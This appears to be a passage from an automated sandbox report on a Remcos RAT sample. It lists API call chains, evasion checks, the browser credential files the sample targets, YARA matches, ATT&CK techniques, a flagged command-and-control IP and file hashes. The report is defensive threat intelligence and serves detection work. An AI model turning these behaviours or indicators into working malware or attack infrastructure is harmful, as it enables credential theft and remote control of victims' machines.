                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,1_2_0041BCE3
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_004567E0 push eax; ret 1_2_004567FE
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_00455EAF push ecx; ret 1_2_00455EC2
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_00433FF6 push ecx; ret 1_2_00434009
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_00406128 ShellExecuteW,URLDownloadToFileW,1_2_00406128
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_00419BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,1_2_00419BC4
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,1_2_0041BCE3
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      barindex
                      Delayed program exit found
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_0040E54F Sleep,ExitProcess,1_2_0040E54F
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,1_2_004198C2
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeWindow / User API: threadDelayed 5142Jump to behavior
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeWindow / User API: threadDelayed 4850Jump to behavior
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeAPI coverage: 8.8 %
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe TID: 5500Thread sleep count: 5142 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe TID: 5500Thread sleep time: -15426000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe TID: 5500Thread sleep count: 4850 > 30Jump to behavior
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe TID: 5500Thread sleep time: -14550000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,1_2_0040B335
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,1_2_0041B42F
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,1_2_0040B53A
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_0044D5E9 FindFirstFileExA,1_2_0044D5E9
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,1_2_004089A9
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_00406AC2 FindFirstFileW,FindNextFileW,1_2_00406AC2
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,1_2_00407A8C
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,1_2_00418C69
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,1_2_00408DA7
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,1_2_00406F06
                      Source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, 00000001.00000002.4758896538.00000000005CE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeAPI call chain: ExitProcess graph end nodegraph_1-47305
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0043A65D
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_0041BCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,1_2_0041BCE3
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_00442554 mov eax, dword ptr fs:[00000030h]1_2_00442554
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_0044E92E GetProcessHeap,1_2_0044E92E
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_00434168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00434168
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_0043A65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_0043A65D
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_00433B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00433B44
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_00433CD7 SetUnhandledExceptionFilter,1_2_00433CD7
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe1_2_00410F36
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_00418754 mouse_event,1_2_00418754
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_00433E0A cpuid 1_2_00433E0A
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: EnumSystemLocalesW,1_2_004470AE
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: GetLocaleInfoW,1_2_004510BA
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,1_2_004511E3
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: GetLocaleInfoW,1_2_004512EA
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,1_2_004513B7
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: GetLocaleInfoW,1_2_00447597
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: GetLocaleInfoA,1_2_0040E679
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,1_2_00450A7F
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: EnumSystemLocalesW,1_2_00450CF7
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: EnumSystemLocalesW,1_2_00450D42
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: EnumSystemLocalesW,1_2_00450DDD
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,1_2_00450E6A
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_00404915 GetLocalTime,CreateEventA,CreateThread,1_2_00404915
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_0041A7A2 GetComputerNameExW,GetUserNameW,1_2_0041A7A2
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: 1_2_0044800F _free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,1_2_0044800F
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                      Stealing of Sensitive Information

                      barindex
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, type: SAMPLE
                      Source: Yara matchFile source: 1.2.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000000.2293845385.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.4758896538.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe PID: 5272, type: MEMORYSTR
                      Contains functionality to steal Chrome passwords or cookies
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: \AppData\Local\Google\Chrome\User Data\Default\Login Data1_2_0040B21B
                      Contains functionality to steal Firefox passwords or cookies
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: \AppData\Roaming\Mozilla\Firefox\Profiles\1_2_0040B335
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: \key3.db1_2_0040B335

                      Remote Access Functionality

                      barindex
                      Detected Remcos RAT
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-4NJUM7Jump to behavior
                      Yara detected Remcos RAT
                      Source: Yara matchFile source: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe, type: SAMPLE
                      Source: Yara matchFile source: 1.2.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 1.0.1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe.400000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000001.00000000.2293845385.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.4758757369.0000000000457000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000001.00000002.4758896538.00000000005CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe PID: 5272, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exeCode function: cmd.exe1_2_00405042

                      Mitre Att&ck Matrix

                      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                      Native API                      		1
                      DLL Side-Loading                      		1
                      DLL Side-Loading                      		1
                      Deobfuscate/Decode Files or Information                      		1
                      OS Credential Dumping                      		2
                      System Time Discovery                      		Remote Services11
                      Archive Collected Data                      		11
                      Ingress Tool Transfer                      		Exfiltration Over Other Network Medium1
                      System Shutdown/Reboot
                      CredentialsDomainsDefault Accounts12
                      Command and Scripting Interpreter                      		1
                      Windows Service                      		1
                      Bypass User Account Control                      		2
                      Obfuscated Files or Information                      		111
                      Input Capture                      		1
                      Account Discovery                      		Remote Desktop Protocol111
                      Input Capture                      		2
                      Encrypted Channel                      		Exfiltration Over Bluetooth1
                      Defacement
                      Email AddressesDNS ServerDomain Accounts2
                      Service Execution                      		Logon Script (Windows)1
                      Access Token Manipulation                      		1
                      DLL Side-Loading                      		2
                      Credentials In Files                      		1
                      System Service Discovery                      		SMB/Windows Admin Shares3
                      Clipboard Data                      		1
                      Non-Standard Port                      		Automated ExfiltrationData Encrypted for Impact
                      Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                      Windows Service                      		1
                      Bypass User Account Control                      		NTDS2
                      File and Directory Discovery                      		Distributed Component Object ModelInput Capture1
                      Remote Access Software                      		Traffic DuplicationData Destruction
                      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                      Process Injection                      		1
                      Virtualization/Sandbox Evasion                      		LSA Secrets23
                      System Information Discovery                      		SSHKeylogging1
                      Application Layer Protocol                      		Scheduled TransferData Encrypted for Impact
                      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                      Access Token Manipulation                      		Cached Domain Credentials21
                      Security Software Discovery                      		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                      DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                      Process Injection                      		DCSync1
                      Virtualization/Sandbox Evasion                      		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                      Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
                      Process Discovery                      		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                      Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                      Application Window Discovery                      		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                      IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                      System Owner/User Discovery                      		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                      Behavior Graph

                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet

                      Screenshots

                      Thumbnails

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand

                      Antivirus, Machine Learning and Genetic Malware Detection

                      Initial Sample

                      SourceDetectionScannerLabelLink
                      1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe88%ReversingLabsWin32.Backdoor.Remcos
                      1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe100%AviraBDS/Backdoor.Gen
                      1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe100%Joe Sandbox ML

                      Dropped Files

                      No Antivirus matches

                      Unpacked PE Files

                      No Antivirus matches

                      Domains

                      No Antivirus matches

                      URLs

                      No Antivirus matches

                      Domains and IPs

                      Contacted Domains

                      No contacted domains info

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      http://geoplugin.net/json.gp1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exefalse
                        		high
                        http://geoplugin.net/json.gp/C1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exefalse
                          		high

                          World Map of Contacted IPs

                          • No. of IPs < 25%
                          • 25% < No. of IPs < 50%
                          • 50% < No. of IPs < 75%
                          • 75% < No. of IPs

                          Public IPs

                          IPDomainCountryFlagASNASN NameMalicious
                          104.243.246.120
                          		unknownUnited States
                          		3223VOXILITYGBtrue

                          General Information

                          Joe Sandbox version:41.0.0 Charoite
                          Analysis ID:1570007
                          Start date and time:2024-12-06 14:10:09 +01:00
                          Joe Sandbox product:CloudBasic
                          Overall analysis duration:0h 6m 29s
                          Hypervisor based Inspection enabled:false
                          Report type:full
                          Cookbook file name:default.jbs
                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                          Number of analysed new started processes analysed:4
                          Number of new started drivers analysed:0
                          Number of existing processes analysed:0
                          Number of existing drivers analysed:0
                          Number of injected processes analysed:0
                          Technologies:
                          • HCA enabled
                          • EGA enabled
                          • AMSI enabled
                          Analysis Mode:default
                          Analysis stop reason:Timeout
                          Sample name:1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe
                          Detection:MAL
                          Classification:mal100.rans.troj.spyw.expl.evad.winEXE@1/0@0/1
                          EGA Information:
                          • Successful, ratio: 100%
                          HCA Information:
                          • Successful, ratio: 100%
                          • Number of executed functions: 25
                          • Number of non-executed functions: 204
                          Cookbook Comments:
                          • Found application associated with file extension: .exe
                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                          Warnings

                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                          • Excluded domains from analysis (whitelisted): client.wns.windows.com, ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                          • VT rate limit hit for: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe

                          Simulations

                          Behavior and APIs

                          TimeTypeDescription
                          08:11:53API Interceptor4642989x Sleep call for process: 1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe modified

                          Joe Sandbox View / Context

                          IPs

                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                          104.243.246.1201730537046a28265099d74997f6aaf573f6441587128b68a620c5fd7396901e33fe86509f2931.dat-decoded.exeGet hashmaliciousNjratBrowse

                            Domains

                            No context

                            ASNs

                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                            VOXILITYGBnabsh4.elfGet hashmaliciousUnknownBrowse
                            • 46.243.206.70
                            7jBzTH9FXQ.exeGet hashmaliciousUnknownBrowse
                            • 37.221.166.158
                            fACYdCvub8.exeGet hashmaliciousUnknownBrowse
                            • 5.254.60.108
                            powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                            • 37.221.160.225
                            Bank Information Details.batGet hashmaliciousLodaRAT, XRedBrowse
                            • 172.111.138.100
                            1730537046a28265099d74997f6aaf573f6441587128b68a620c5fd7396901e33fe86509f2931.dat-decoded.exeGet hashmaliciousNjratBrowse
                            • 104.243.246.120
                            Purchase Order Supplies.Pdf.exeGet hashmaliciousLodaRATBrowse
                            • 172.111.138.100
                            zR4aIjCuRs.exeGet hashmaliciousRemcos, GuLoaderBrowse
                            • 45.74.58.7
                            5s5Ut98vVh.batGet hashmaliciousUnknownBrowse
                            • 172.94.3.25
                            Marys Organizer 2023 Release.zipGet hashmaliciousRemcosBrowse
                            • 45.74.48.2

                            JA3 Fingerprints

                            No context

                            Dropped Files

                            No context

                            Created / dropped Files

                            No created / dropped files found

                            Static File Info

                            General

                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                            Entropy (8bit):6.586438598430375
                            TrID:
                            • Win32 Executable (generic) a (10002005/4) 99.96%
                            • Generic Win/DOS Executable (2004/3) 0.02%
                            • DOS Executable Generic (2002/1) 0.02%
                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                            File name:1733490559d59c04cc496d19f458945b96e65fd57801bd9b53502be73c34ff8d8deb937e45230.dat-decoded.exe
                            File size:493'056 bytes
                            MD5:68011a26bb98d3b77de9594ae7624358
                            SHA1:e065720bd4e4299160f7cbbee1708cd91140dff1
                            SHA256:6a050c9c875f5748908ab6c4ced355dd530137e98f3b28f06807c454c52a6dbe
                            SHA512:64359e2919b69ca62a83463ea6e7a58f7adb76ab6db936cf92780a4c971810e8f060f109ce4432f2e0f51cbd31cbf8d68c6ee6beb46106034521beb1ddc1dd89
                            SSDEEP:12288:XuD09AUkNIGBYYv4eK13x13nZHSRVMf139F5wIB7+IwtHwBtVxbesvZDSU+DY:K09AfNIEYsunZvZ19ZPs
                            TLSH:6BA4BF01B6D2C072D57625300D26E775DEBDBD212835897BB3DA1D67FE30180E63AAB2
                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)...H...H...H....(..H....*..H....+..H...0]..H..&....H... ...H... ...H... ...H...0J..H...H...I...!...H...!&..H...!...H..Rich.H.

                            File Icon

                            Icon Hash:95694d05214c1b33

                            Static PE Info

                            General

                            Entrypoint:0x433b3a
                            Entrypoint Section:.text
